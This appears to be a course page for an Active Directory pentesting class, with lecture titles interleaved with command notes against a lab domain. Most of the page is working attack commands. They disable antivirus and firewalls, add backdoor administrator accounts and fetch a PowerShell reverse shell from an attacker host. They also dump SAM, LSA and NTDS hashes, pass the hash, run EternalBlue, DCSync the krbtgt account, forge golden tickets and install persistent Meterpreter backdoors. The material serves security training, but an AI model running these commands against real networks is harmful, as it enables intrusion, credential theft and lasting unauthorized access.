Active Directory Pentesting With Kali Linux Red Team Hacking
Tags: Active Directory
Attacking and Hacking Active Directory With Kali Linux Full Course - Red Team Hacking Pentesting
Last updated 2022-01-10 | 4.2
What you'll learn
- How to Use Metasploit to Exploit Active Directory
- How to Use Empire to Exploit Active Directory
- How to Use Evil-WinRM to Exploit Active Directory
Requirements
* How Active Directory Works
* Windows Server Experience
Description
- How to Use Metasploit to Exploit Active Directory
- How to Use Empire to Exploit Active Directory
- How to Use Evil-WinRM to Exploit Active Directory
- How to Use CrackMapExec to Exploit Active Directory
- How to Exploit Active Directory From Windows
- How to Do Active Directory Enumeration
- How to do Lateral Movement
- Active Directory Post Exploitation
- Active Directory Domain Privilege Escalation
- Active Directory Persistence Attacks
- How to use Kali Linux to hack Active Directory
- How to use nmap to Enumerate Servers
- How to exploit EternalBlue
Course content
11 sections • 105 lectures
Introduction Preview 02:04
windapsearch Preview 19:21
https://github.com/ropnop/windapsearch
LdapDomainDump Preview 15:24
Download it here:
https://github.com/dirkjanm/ldapdomaindump
Enumerating With Enum4Linux Preview 09:04
enum4linux -u ippsec -p Password12345 -a 192.168.1.50
NMAP - Users Preview 06:24
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn
GetADUsers.py Preview 08:31
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py
python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py
python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec
python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec
CrackMapExec Intro Preview 08:53
https://github.com/byt3bl33d3r/CrackMapExec
CrackMapExec - Password Spraying Preview 12:37
Bruteforcing examples
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
CrackMapExec - ENUM 1.1 Preview 09:49
Enumerate shares and access
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares
Enumerate active sessions
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --sessions
Enumerate disks
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --disks
Enumerate logged on users
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users
Enumerate domain users
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users
CrackMapExec - ENUM 1.2 Preview 09:41
python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users
Enumerate users by bruteforcing RID
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
Enumerate domain groups
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
Enumerate local groups
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
Obtain domain password policy
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol
CrackMapExec - Command Execution Preview 13:35
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:\Users\ippsec\Desktop\user.txt"'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:\Users\ippsec\Desktop'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:\Users\ippsec\Desktop\user.txt'
crackmapexec - Command execution + Using Local Auth Preview 12:11
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'net user /add admin Password12345'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'net user'
#Add to Administrator Group
crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345 -x 'net localgroup administrators admin /add'
crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345 -x 'net localgroup administrators'
crackmapexec winrm 192.168.215.138 -u admin -p Password12345 --local-auth
Get PowerShell Reverse Shell Preview 11:26
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1
mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1
nc -lvp 1234
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'
Dumping SAM Preview 05:36
SAM is short for the Security Account Manager, which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored in the SAM. It is the responsibility of the LSA (Local Security Authority) to verify user logins by matching the passwords against the database maintained in the SAM. The SAM starts running in the background as soon as Windows boots up. The SAM is found in C:\Windows\System32\config, and the hashed passwords saved in the SAM can be found in the registry: open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SAM.
crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam
ls ~/.cme/logs/
Dumping LSA + PTH with CME Preview 16:43
sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa
#Where the dumps are stored
ls ~/.cme/logs/
cracking with John
john --format=NT hash
john --format=NT hash --show
john --format=NT --wordlist=/home/user/Desktop/rockyou.txt hash
crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'
#against the domain controller (192.168.1.50), too
crackmapexec winrm 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'
#Dump the entire NTLM --ntds database
sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds
pth-winexe and xfreerdp Preview 10:07
pth-winexe -U pentesting/
pth-winexe
apt-get update
apt-get install freerdp-x11
xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54
CrackMapExec Modules Preview 13:40
crackmapexec smb -L
crackmapexec smb -M mimikatz --options
sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345
sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81
Module output is saved here:
ls /root/.cme/logs/
CrackMapExec CMEDB Preview 06:48
#start the database
cmedb
help
proto smb
help
creds
sudo crackmapexec smb 192.168.1.50 -id 2
sudo crackmapexec smb 192.168.1.50 -id 3
BloodHound Installation Preview 20:40
Install Java:
echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list
sudo apt-get update
Install Neo4j:
1. Add the neo4j repo to your apt sources:
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable 4.0' | sudo tee /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
2. Install apt-transport-https with apt:
sudo apt-get install apt-transport-https
3. Install neo4j community edition using apt:
sudo apt-get install neo4j
4. Stop neo4j:
systemctl stop neo4j
5. Start neo4j, either in the foreground or as a service:
cd /usr/bin
./neo4j console
systemctl start neo4j
Open a web browser and navigate to https://localhost:7474/.
You should see the neo4j web console.
Authenticate to neo4j in the web console with username neo4j, password neo4j.
You’ll be prompted to change this password.
Download the BloodHound GUI
Download the latest version of the BloodHound GUI from
https://github.com/BloodHoundAD/BloodHound/releases
Unzip the folder, then run BloodHound with the --no-sandbox flag:
./BloodHound.bin --no-sandbox
https://bloodhound.readthedocs.io/en/latest/installation/linux.html
BADDD No AUDIO Getting Shells with CrackMapExec Preview 08:50
sudo msfconsole
use exploit/multi/handler
set LHOST 192.168.1.223 #local machine
set LPORT 470
python3 -m http.server
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'
Basic commands Preview 06:15
AMSI
AntiMalware Scan Interface
Windows AMSI is integrated into the following components:
PowerShell (scripts, interactive use, and dynamic code evaluation)
PowerShell ISE (Windows PowerShell-IDE)
Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)
User Account Control (UAC) (using a different type of AMSI-provider)
Office365 (JavaScript/VBA)
Office365 (Documents)
.Net Framework 4.8 (Scanning for all assemblies)
Windows Management Instrumentation (WMI)
Upload and Download Preview 04:30
upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
usage: upload local_path remote_path
download: it is not needed to set local_path if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
PowerView.ps1 Preview 07:20
iex (New-Object Net.WebClient).DownloadString('http://192.168.1.223:8000/PowerView.ps1')
Build SharpSploit - Enumeration Preview 06:11
Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll
menu
[SharpSploit.
[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()
[SharpSploit.Enumeration.Net]::GetNetLocalGroups()
[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()
[SharpSploit.Enumeration.Net]::GetNetSessions()
[SharpSploit.Enumeration.Net]::GetNetShares()
User, Group, and Network Preview 00:29
User Enumeration
Get current username
echo %USERNAME% || whoami
$env:username
List user privilege
whoami /priv
whoami /groups
List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements (lockout threshold, password policy); useful when planning bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group (i.e. administrators)
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
List all current connections
netstat -ano
List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List firewall's blocked ports
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
OS, AV, and Configuration Preview 00:54
Tools - Local Priv Esc Preview 01:03
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
Sherlock and Watson Preview 07:10
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
CVE-2019-1388 Preview 07:37
SEImpersonate Preview 10:19
Unquoted Service Path Preview 19:03
Windows - Privilege Escalation and Local Enumeration Cheat Sheet Preview 00:00
Recommended Windows Hack The Box machines Preview 00:09
Basics and Installing Preview 11:41
https://github.com/BC-SECURITY/Empire
sudo apt install powershell-empire
sudo powershell-empire
Getting a Shell + CME + Powershell Preview 07:10
https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/
Getting a shell + Evil-WinRM + Bat File Preview 11:22
Listeners
help
uselistener http
info <- it will display all the options that you can tweak
set BindIP to Kali's IP address
set Port to any port number other than 80
execute
https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit
Privilege Escalation 1 - Reverse Shell With Unquoted Path Preview 25:33
Privilege Escalation 2 - Stager with NT/SYSTEM Preview 06:04
Privilege Escalation 3 Preview 11:06
net user raba Password123 /add
net localgroup administrators raba /add
net localgroup "Remote Management Users" raba /add
remove old
Elevated with Empire - Mimikatz and pth Preview 08:39
Pth + dcsync + dcshadow -1 Preview 15:02
Troubleshooting Empire Pth + dcsync + dcshadow - 2 Preview 15:10
Failed to get + dcsync + dcshadow - 3 Preview 04:39
Getting Shell with JenkinsAdmin Preview 06:38
evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50
upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat
C:\Users\jenkinsadmin\Documents\launcher.bat
Finally Getting Dcsync + Persistent Preview 06:28
Intro Preview 12:45
Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.
Exploiting EternalBlue with Metasploit Preview 09:24
Check if it is exploitable:
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.1.53
set smbpass Password123
set smbuser student1
set smbdomain pentesting.local
set payload windows/meterpreter/reverse_tcp
run
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Enumeration 1 - User, Groups, Computers Preview 12:23
use auxiliary/gather/kerberos_enumusers
sysinfo
ps
post/windows/gather/enum_ad_users
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_ad_user_comments
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain
post/windows/gather/enum_computers
post/windows/gather/resolve_sid
run post/windows/gather/enum_ad_computers
post/windows/gather/local_admin_search_enum
post/windows/gather/enum_ad_service_principal_names
Enumeration 2 - Arp, Tokens, Patches Preview 11:22
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
ipconfig
netstat
route
#Windows Gather Enumerate Domain Admin Tokens (T
post/windows/gather/enum_tokens
post/windows/gather/enum_patches
post/windows/gather/credentials/winscp
#Windows Gather Powershell Environment Setting E
post/windows/gather/enum_powershell_env
post/windows/gather/enum_ie
post/windows/gather/bloodhound
For more:
search post/windows/gather/
Enumeration 3 - Shares, SMB, and More Preview 09:47
use post/windows/gather/enum_shares
use post/windows/gather/enum_services
use post/windows/gather/enum_snmp
use post/windows/gather/enum_chrome
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_putty_saved_sessions
use post/windows/gather/enum_applications
use post/windows/gather/win_privs
use post/windows/gather/forensics/browser_history
For more:
search post/windows/gather/
Exploit Suggestor Preview 08:51
LOCAL_EXPLOIT_SUGGESTER
run post/multi/recon/local_exploit_suggester
post/windows/gather/win_privs
Exploit Suggestor 2 Preview 10:26
Back door add user Preview 07:19
post/windows/manage/add_user
set addtogroup true
set username test
set group administrators
set session 2
post/windows/manage/delete_user
HashDump With Metasploit Preview 06:28
search hashdump
search credential_collector
post/windows/gather/hashdump
post/windows/gather/credentials/credential_collector
meterpreter > load kiwi
meterpreter > help
Testing Credentials
crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!
Lateral Movement - PTH With metasploit Preview 14:40
https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Pass The Hash with Psexec: all that is needed to perform this is the NTLM hash of a privileged user, which is exactly what was obtained earlier with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser ippsec
set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe
set rhosts 192.168.1.55
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
Check whether the user is a member of Domain Users:
use post/windows/gather/enum_domain_group_users
Lateral Movement To DC - Metasploit Preview 11:42
Pass The Hash with Psexec: all that is needed to perform this is the NTLM hash of a privileged user, which is exactly what was obtained earlier with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser s4vitar
set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71
set rhosts 192.168.1.50
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
Check whether the user is a member of Domain Users:
use post/windows/gather/enum_domain_group_users
use post/windows/gather/credentials/domain_hashdump
scanner/smb/impacket/secretsdump
Steal_Token and Dumping All Hashes - Metasploit Preview 05:58
In the Metasploit Framework there is an extension called incognito which allows us to perform activities such as token stealing and manipulation. These kinds of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator, for example, we can perform higher-privilege operations on the target.
use post/windows/gather/credentials/domain_hashdump
use incognito
list_tokens -u
impersonate_token PENTESTING\\Administrator
DcSync With Metasploit Preview 04:55
From Domain Controller
meterpreter > use incognito
meterpreter > impersonate_token PENTESTING\\Administrator
meterpreter > load kiwi
meterpreter > help
meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'
meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'
Golden Ticket With Metasploit Preview 07:17
use post/windows/escalate/golden_ticket
Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.
The attacker gains control over the domain's Key Distribution Service account (the KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.
With valid TGTs, the attacker can request access to any resource/system in the domain from the Ticket Granting Service (TGS).
Because the attacker controls the component of the access control system that is responsible for issuing TGTs, he holds a golden ticket to access any resource in the domain.
kerberos_ticket_list
kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin
BACKDOOR METERPRETER SERVICE 1 Preview 05:30
After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.
meterpreter > run persistence -h
meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223
meterpreter > exit
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.223
set LPORT 4458
exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.
BACKDOOR METERPRETER SERVICE 2 Preview 01:28
Intro Domain Enumeration Preview 00:39
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
Domain User Enumeration Preview 13:41
Domain Group Enumeration Preview 10:54
Domain Computer/Servers Enumeration Preview 07:10
PowerView - GPO and OU Preview 12:42
Domain Shares Enumeration Preview 10:39
PowerView - ACL Preview 20:55
Active Directory Recon Preview 08:58
BloodHound Installation Preview 16:31
BloodHound Basics Preview 17:38
Domain Enumeration Cheat Sheet - PowerView Preview 00:00
Intro to Lateral Movement - RDP Preview 01:01
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
How Kerberos Work Preview 00:00
Dumping SAM and SYSTEM For Offline Cracking Preview 11:55
SAM & LSA with MimiKatz Preview 08:26
PassTheHash with MimiKatz Preview 17:22
A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn't need to decrypt the hash to obtain a plain-text password. PtH attacks exploit the authentication protocol, as the password hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system's active memory and other techniques.
Passing the ticket Preview 15:16
In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.
One primary difference between pass-the-hash and pass-the-ticket is that Kerberos TGTs expire (10 hours by default), whereas NTLM hashes only change when the user changes their password. So a TGT must be used within its lifetime, or it can be renewed for a longer period of time (7 days).
Pass the ticket with Rubeus Preview 08:07
Session Hijack Preview 04:46
SMB Relay Attack Preview 08:10
10 ways to get dump files Preview 00:00
Intro - Domain Privilege Escalation Preview 00:53
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
ACL - GenericAll on Group Preview 11:45
Priv Esc – DNSAdmins Preview 22:20
dcsync Preview 19:19
Unconstrained delegation - Computer Preview 15:22
constrained Delegation - Computer Preview 14:52
ACL - GenericWrite on User Preview 12:18
SET-SPN - Kerberoast Preview 15:25
Targeted Kerberoasting - AS-REPs - FINDING Preview 11:30
Targeted Kerberoasting - AS-REPs - SET Preview 12:36
Intro Domain Persistence and Dominance - RDP Preview 00:57
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg